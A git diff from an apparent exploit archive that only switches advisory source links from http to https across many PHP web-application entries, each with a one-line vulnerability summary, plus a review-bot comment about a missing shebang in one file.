b/exploits/php/webapps/27912.txt index a4d0a928b..f17494eab 100644 --- a/exploits/php/webapps/27912.txt +++ b/exploits/php/webapps/27912.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18124/info +source: https://www.securityfocus.com/bid/18124/info CoolPHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27916.txt b/exploits/php/webapps/27916.txt index bdb4678fb..a510b93ec 100644 --- a/exploits/php/webapps/27916.txt +++ b/exploits/php/webapps/27916.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18142/info +source: https://www.securityfocus.com/bid/18142/info Photoalbum B&W is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27917.txt b/exploits/php/webapps/27917.txt index c06b9d203..2295257f4 100644 --- a/exploits/php/webapps/27917.txt +++ b/exploits/php/webapps/27917.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18143/info +source: https://www.securityfocus.com/bid/18143/info TikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27919.txt b/exploits/php/webapps/27919.txt index c382c621b..d8e15fa8b 100644 --- a/exploits/php/webapps/27919.txt +++ b/exploits/php/webapps/27919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18154/info +source: https://www.securityfocus.com/bid/18154/info Geeklog is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27920.txt b/exploits/php/webapps/27920.txt index dc248b1e1..7df22ddaf 100644 --- a/exploits/php/webapps/27920.txt +++ b/exploits/php/webapps/27920.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18161/info +source: https://www.securityfocus.com/bid/18161/info EVA-Web is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27921.txt b/exploits/php/webapps/27921.txt index d0545ce2d..836b69a1c 100644 --- a/exploits/php/webapps/27921.txt +++ b/exploits/php/webapps/27921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18161/info +source: https://www.securityfocus.com/bid/18161/info EVA-Web is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27922.txt b/exploits/php/webapps/27922.txt index 8afe6a156..19715f7b4 100644 --- a/exploits/php/webapps/27922.txt +++ b/exploits/php/webapps/27922.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18161/info +source: https://www.securityfocus.com/bid/18161/info EVA-Web is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27924.txt b/exploits/php/webapps/27924.txt index 8c4c77780..f06f27513 100644 --- a/exploits/php/webapps/27924.txt +++ b/exploits/php/webapps/27924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18178/info +source: https://www.securityfocus.com/bid/18178/info ToendaCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27926.txt b/exploits/php/webapps/27926.txt index 4213a5dd8..b866e5a66 100644 --- a/exploits/php/webapps/27926.txt +++ b/exploits/php/webapps/27926.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18185/info +source: https://www.securityfocus.com/bid/18185/info phpMyDesktop|arcade is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. diff --git a/exploits/php/webapps/27927.txt b/exploits/php/webapps/27927.txt index 24792adb0..672577be3 100644 --- a/exploits/php/webapps/27927.txt +++ b/exploits/php/webapps/27927.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18186/info +source: https://www.securityfocus.com/bid/18186/info PHP-Nuke is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27928.txt b/exploits/php/webapps/27928.txt index b102faccb..368288c9a 100644 --- a/exploits/php/webapps/27928.txt +++ b/exploits/php/webapps/27928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18190/info +source: https://www.securityfocus.com/bid/18190/info osTicket is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27929.txt b/exploits/php/webapps/27929.txt index deffef38b..8fdbbccdb 100644 --- a/exploits/php/webapps/27929.txt +++ b/exploits/php/webapps/27929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18197/info +source: https://www.securityfocus.com/bid/18197/info vBulletin is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27933.txt b/exploits/php/webapps/27933.txt index 8ca885710..27e44bc3a 100644 --- a/exploits/php/webapps/27933.txt +++ b/exploits/php/webapps/27933.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18216/info +source: https://www.securityfocus.com/bid/18216/info Tekno.Portal is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27934.txt b/exploits/php/webapps/27934.txt index 27be5e8fc..a72875389 100644 --- a/exploits/php/webapps/27934.txt +++ b/exploits/php/webapps/27934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18218/info +source: https://www.securityfocus.com/bid/18218/info Abarcar Realty Portal is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27946.txt b/exploits/php/webapps/27946.txt index aebe99183..fdced6a89 100644 --- a/exploits/php/webapps/27946.txt +++ b/exploits/php/webapps/27946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18227/info +source: https://www.securityfocus.com/bid/18227/info Portix-PHP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27947.txt b/exploits/php/webapps/27947.txt index 1a70e8e40..eb88b3949 100644 --- a/exploits/php/webapps/27947.txt +++ b/exploits/php/webapps/27947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18230/info +source: https://www.securityfocus.com/bid/18230/info TAL RateMyPic is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27948.txt b/exploits/php/webapps/27948.txt index ee67f8e65..e009ad7c5 100644 --- a/exploits/php/webapps/27948.txt +++ b/exploits/php/webapps/27948.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18231/info +source: https://www.securityfocus.com/bid/18231/info SquirrelMail is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27949.txt b/exploits/php/webapps/27949.txt index 600219f1f..670961497 100644 --- a/exploits/php/webapps/27949.txt +++ b/exploits/php/webapps/27949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27950.txt b/exploits/php/webapps/27950.txt index fdec4f08c..fcfd24214 100644 --- a/exploits/php/webapps/27950.txt +++ b/exploits/php/webapps/27950.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27951.txt b/exploits/php/webapps/27951.txt index fdfb536da..05fd838cf 100644 --- a/exploits/php/webapps/27951.txt +++ b/exploits/php/webapps/27951.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27952.txt b/exploits/php/webapps/27952.txt index 79945447f..1a4c0e6f6 100644 --- a/exploits/php/webapps/27952.txt +++ b/exploits/php/webapps/27952.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27953.txt b/exploits/php/webapps/27953.txt index d03cf304e..42ea6e3a6 100644 --- a/exploits/php/webapps/27953.txt +++ b/exploits/php/webapps/27953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27954.txt b/exploits/php/webapps/27954.txt index 0bdc24071..3516f28d2 100644 --- a/exploits/php/webapps/27954.txt +++ b/exploits/php/webapps/27954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27955.txt b/exploits/php/webapps/27955.txt index 41bd67bda..aca1c5196 100644 --- a/exploits/php/webapps/27955.txt +++ b/exploits/php/webapps/27955.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27956.txt b/exploits/php/webapps/27956.txt index a8b332de0..beb44c664 100644 --- a/exploits/php/webapps/27956.txt +++ b/exploits/php/webapps/27956.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27958.txt b/exploits/php/webapps/27958.txt index b1d66abd4..4aec33683 100644 --- a/exploits/php/webapps/27958.txt +++ b/exploits/php/webapps/27958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18243/info +source: https://www.securityfocus.com/bid/18243/info PHP Pro Publish is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27959.txt b/exploits/php/webapps/27959.txt index cd044d30e..d823d0b0d 100644 --- a/exploits/php/webapps/27959.txt +++ b/exploits/php/webapps/27959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18244/info +source: https://www.securityfocus.com/bid/18244/info PHP ManualMaker is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27961.txt b/exploits/php/webapps/27961.txt index 2d34d91ca..c1259910b 100644 --- a/exploits/php/webapps/27961.txt +++ b/exploits/php/webapps/27961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18255/info +source: https://www.securityfocus.com/bid/18255/info The phpBB application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27962.txt b/exploits/php/webapps/27962.txt index 1715ee320..d1592b16a 100644 --- a/exploits/php/webapps/27962.txt +++ b/exploits/php/webapps/27962.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18256/info +source: https://www.securityfocus.com/bid/18256/info iBWd Guestbook is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27963.txt b/exploits/php/webapps/27963.txt index b240c516d..f1205d18a 100644 --- a/exploits/php/webapps/27963.txt +++ b/exploits/php/webapps/27963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18262/info +source: https://www.securityfocus.com/bid/18262/info xueBook is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27964.txt b/exploits/php/webapps/27964.txt index 3b86ea5ca..6bba2094f 100644 --- a/exploits/php/webapps/27964.txt +++ b/exploits/php/webapps/27964.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18268/info +source: https://www.securityfocus.com/bid/18268/info CoolForum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27970.txt b/exploits/php/webapps/27970.txt index 573bb8d2a..963aefab5 100644 --- a/exploits/php/webapps/27970.txt +++ b/exploits/php/webapps/27970.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18272/info +source: https://www.securityfocus.com/bid/18272/info CyBoards PHP Lite is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/27972.txt b/exploits/php/webapps/27972.txt index b8f98086f..11d07e9e6 100644 --- a/exploits/php/webapps/27972.txt +++ b/exploits/php/webapps/27972.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18279/info +source: https://www.securityfocus.com/bid/18279/info ESTsoft InternetDisk is prone to an arbitrary file-upload and script-execution vulnerability. diff --git a/exploits/php/webapps/27973.txt b/exploits/php/webapps/27973.txt index 075a31697..8c4a1ebec 100644 --- a/exploits/php/webapps/27973.txt +++ b/exploits/php/webapps/27973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18281/info +source: https://www.securityfocus.com/bid/18281/info Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27974.txt b/exploits/php/webapps/27974.txt index 7b5fec8b8..5ecdeeaa4 100644 --- a/exploits/php/webapps/27974.txt +++ b/exploits/php/webapps/27974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18281/info +source: https://www.securityfocus.com/bid/18281/info Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27975.txt b/exploits/php/webapps/27975.txt index 132cc63af..5fa0fa1fa 100644 --- a/exploits/php/webapps/27975.txt +++ b/exploits/php/webapps/27975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18281/info +source: https://www.securityfocus.com/bid/18281/info Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27976.txt b/exploits/php/webapps/27976.txt index e396f8460..a3838f304 100644 --- a/exploits/php/webapps/27976.txt +++ b/exploits/php/webapps/27976.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18281/info +source: https://www.securityfocus.com/bid/18281/info Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27977.txt b/exploits/php/webapps/27977.txt index f81e6437c..58049f461 100644 --- a/exploits/php/webapps/27977.txt +++ b/exploits/php/webapps/27977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18282/info +source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27978.txt b/exploits/php/webapps/27978.txt index 7e628426c..e21ce3dbd 100644 --- a/exploits/php/webapps/27978.txt +++ b/exploits/php/webapps/27978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18282/info +source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27979.html b/exploits/php/webapps/27979.html index 459a92433..d2fcd6aec 100644 --- a/exploits/php/webapps/27979.html +++ b/exploits/php/webapps/27979.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18287/info +source: https://www.securityfocus.com/bid/18287/info myNewsletter is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27980.txt b/exploits/php/webapps/27980.txt index b073bd191..5e3b02751 100644 
--- a/exploits/php/webapps/27980.txt +++ b/exploits/php/webapps/27980.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18293/info +source: https://www.securityfocus.com/bid/18293/info DownloadEngine is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27982.txt b/exploits/php/webapps/27982.txt index d85d02ab8..df4bd2e5d 100644 --- a/exploits/php/webapps/27982.txt +++ b/exploits/php/webapps/27982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18296/info +source: https://www.securityfocus.com/bid/18296/info GANTTy is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27985.txt b/exploits/php/webapps/27985.txt index 53fe02a2b..94da7ae83 100644 --- a/exploits/php/webapps/27985.txt +++ b/exploits/php/webapps/27985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18306/info +source: https://www.securityfocus.com/bid/18306/info AZ Photo Album Script Pro is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/27988.py b/exploits/php/webapps/27988.py index 0e38942cd..f4af3a8f8 100755 --- a/exploits/php/webapps/27988.py +++ b/exploits/php/webapps/27988.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18313/info +source: https://www.securityfocus.com/bid/18313/info MiraksGalerie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27989.txt b/exploits/php/webapps/27989.txt index e8cdc85e3..c1628ea91 100644 --- a/exploits/php/webapps/27989.txt +++ b/exploits/php/webapps/27989.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18313/info +source: https://www.securityfocus.com/bid/18313/info MiraksGalerie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27990.txt b/exploits/php/webapps/27990.txt index ec8c99635..5d0a6bae7 100644 --- a/exploits/php/webapps/27990.txt +++ b/exploits/php/webapps/27990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18314/info +source: https://www.securityfocus.com/bid/18314/info Calendar Express is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27991.txt b/exploits/php/webapps/27991.txt index f6656e43f..46979c794 100644 --- a/exploits/php/webapps/27991.txt +++ b/exploits/php/webapps/27991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18319/info +source: https://www.securityfocus.com/bid/18319/info PostNuke is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection vulnerabilities, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27994.txt b/exploits/php/webapps/27994.txt index 7710853fe..cab149454 100644 --- a/exploits/php/webapps/27994.txt +++ b/exploits/php/webapps/27994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. diff --git a/exploits/php/webapps/27995.txt b/exploits/php/webapps/27995.txt index 2fd68db68..67f1e275b 100644 --- a/exploits/php/webapps/27995.txt 
+++ b/exploits/php/webapps/27995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. diff --git a/exploits/php/webapps/27996.txt b/exploits/php/webapps/27996.txt index d250dd39e..cea8c037e 100644 --- a/exploits/php/webapps/27996.txt +++ b/exploits/php/webapps/27996.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. diff --git a/exploits/php/webapps/27997.txt b/exploits/php/webapps/27997.txt index 56a3a24eb..776be0712 100644 --- a/exploits/php/webapps/27997.txt +++ b/exploits/php/webapps/27997.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. diff --git a/exploits/php/webapps/27998.txt b/exploits/php/webapps/27998.txt index a040d634e..8f4cf429a 100644 --- a/exploits/php/webapps/27998.txt +++ b/exploits/php/webapps/27998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. 
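Review bot: exploits/php/webapps/27988.py is tracked with mode 100755 and a .py extension, but its hunk starts at line 1 with a bare "source: https://www.securityfocus.com/bid/18313/info" line followed by advisory prose, so the file has no interpreter line and its first lines are not valid Python. Since this change already rewrites line 1, suggest turning the header block into "#" comments with a shebang above it, or dropping the executable bit if the file is meant to be read rather than run. The identical header in 27989.txt is fine as plain text.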
diff --git a/exploits/php/webapps/27999.txt b/exploits/php/webapps/27999.txt index 2a7035875..85e7c956b 100644 --- a/exploits/php/webapps/27999.txt +++ b/exploits/php/webapps/27999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18350/info +source: https://www.securityfocus.com/bid/18350/info vsREAL and vSCAL are prone to multiple cross-site scripting vulnerabilities. These issues are due to the applications' failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28000.txt b/exploits/php/webapps/28000.txt index 0a1cb1288..48f0056b1 100644 --- a/exploits/php/webapps/28000.txt +++ b/exploits/php/webapps/28000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18350/info +source: https://www.securityfocus.com/bid/18350/info vsREAL and vSCAL are prone to multiple cross-site scripting vulnerabilities. These issues are due to the applications' failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28006.txt b/exploits/php/webapps/28006.txt index be294a6c7..98bd6566b 100644 --- a/exploits/php/webapps/28006.txt +++ b/exploits/php/webapps/28006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18383/info +source: https://www.securityfocus.com/bid/18383/info NPDS is prone to multiple input-validation issues, including information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28008.txt b/exploits/php/webapps/28008.txt index 5a8656ca7..0ee2b860c 100644 --- a/exploits/php/webapps/28008.txt +++ b/exploits/php/webapps/28008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18386/info +source: https://www.securityfocus.com/bid/18386/info Adaptive Website Framework is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28009.txt b/exploits/php/webapps/28009.txt index 7ad7a0f8e..5815dbd48 100644 --- a/exploits/php/webapps/28009.txt +++ b/exploits/php/webapps/28009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18390/info +source: https://www.securityfocus.com/bid/18390/info Five Star Review Script is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28010.txt b/exploits/php/webapps/28010.txt index 54f9c7098..1e34a84c8 100644 --- a/exploits/php/webapps/28010.txt +++ b/exploits/php/webapps/28010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18390/info +source: https://www.securityfocus.com/bid/18390/info Five Star Review Script is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28011.txt b/exploits/php/webapps/28011.txt index 8efa1b31b..e6da069b7 100644 --- a/exploits/php/webapps/28011.txt +++ b/exploits/php/webapps/28011.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18391/info +source: https://www.securityfocus.com/bid/18391/info iFoto is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28012.txt b/exploits/php/webapps/28012.txt index 7088ceead..b3d5a3e8c 100644 --- a/exploits/php/webapps/28012.txt +++ b/exploits/php/webapps/28012.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18392/info +source: https://www.securityfocus.com/bid/18392/info Foing is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28013.txt b/exploits/php/webapps/28013.txt index bb8f2a37f..9fc10ab9f 100644 --- a/exploits/php/webapps/28013.txt 
+++ b/exploits/php/webapps/28013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18393/info +source: https://www.securityfocus.com/bid/18393/info SixCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28014.txt b/exploits/php/webapps/28014.txt index 4995047ba..6f2f44390 100644 --- a/exploits/php/webapps/28014.txt +++ b/exploits/php/webapps/28014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18395/info +source: https://www.securityfocus.com/bid/18395/info SixCMS is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28015.txt b/exploits/php/webapps/28015.txt index c68eb4f1e..8517e8294 100644 --- a/exploits/php/webapps/28015.txt +++ b/exploits/php/webapps/28015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18399/info +source: https://www.securityfocus.com/bid/18399/info iFlance is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28016.txt b/exploits/php/webapps/28016.txt index f59c90cd5..5a6d3c97c 100644 --- a/exploits/php/webapps/28016.txt +++ b/exploits/php/webapps/28016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18401/info +source: https://www.securityfocus.com/bid/18401/info DoubleSpeak is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28017.txt b/exploits/php/webapps/28017.txt index 4a63efa8d..cf68ccfc2 100644 --- a/exploits/php/webapps/28017.txt +++ b/exploits/php/webapps/28017.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18402/info +source: https://www.securityfocus.com/bid/18402/info CEScripts scripts are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28018.txt b/exploits/php/webapps/28018.txt index a5b7d2043..2162814b6 100644 --- a/exploits/php/webapps/28018.txt +++ b/exploits/php/webapps/28018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18403/info +source: https://www.securityfocus.com/bid/18403/info VBZooM is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28019.txt b/exploits/php/webapps/28019.txt index 0ff835048..7f50bbf07 100644 --- a/exploits/php/webapps/28019.txt +++ b/exploits/php/webapps/28019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18410/info +source: https://www.securityfocus.com/bid/18410/info Simpnews is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28020.txt b/exploits/php/webapps/28020.txt index dee587b9e..a2f56a8df 100644 --- a/exploits/php/webapps/28020.txt +++ b/exploits/php/webapps/28020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18414/info +source: https://www.securityfocus.com/bid/18414/info 35mmslidegallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28021.txt b/exploits/php/webapps/28021.txt index 511097d9e..e2052bf72 100644 --- a/exploits/php/webapps/28021.txt +++ b/exploits/php/webapps/28021.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18414/info +source: https://www.securityfocus.com/bid/18414/info 35mmslidegallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28022.txt b/exploits/php/webapps/28022.txt index 912282409..5f9560144 100644 --- a/exploits/php/webapps/28022.txt +++ b/exploits/php/webapps/28022.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18423/info +source: https://www.securityfocus.com/bid/18423/info Woltlab Burning Board is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28023.txt b/exploits/php/webapps/28023.txt index 8e34e4dad..78c67357e 100644 --- a/exploits/php/webapps/28023.txt +++ b/exploits/php/webapps/28023.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18426/info +source: https://www.securityfocus.com/bid/18426/info Confixx is prone to a cross-site scripting vulnerability. This issue is due to a failure 